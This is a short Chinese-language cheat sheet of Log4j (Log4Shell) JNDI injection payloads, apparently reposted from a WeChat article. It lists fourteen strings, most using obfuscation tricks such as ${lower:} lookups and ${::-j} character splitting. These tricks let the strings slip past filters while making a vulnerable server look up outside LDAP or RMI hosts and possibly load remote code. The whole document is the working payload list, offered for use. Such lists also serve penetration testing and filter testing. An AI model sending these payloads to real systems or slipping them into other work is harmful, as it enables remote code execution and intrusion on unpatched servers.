常用log4j payload 以及绕过
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ${jndi:ldap://xxx.dnslog.cn}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxx xxxx.xx/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/ass}
${${::-j}ndi:rmi://127.0.0.1:1389/ass}
${jndi:rmi://a.b.c}
${${lower:jndi}:${lower:rmi}://q.w.e/poc}
${${lower:${lower:jndi}}:${lower:rmi}://a.s.d/poc}
abcd-${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}-aksdkashkd--
|
来源:
https://mp.weixin.qq.com/s/VmUh49pHcEumJIKsulW3gw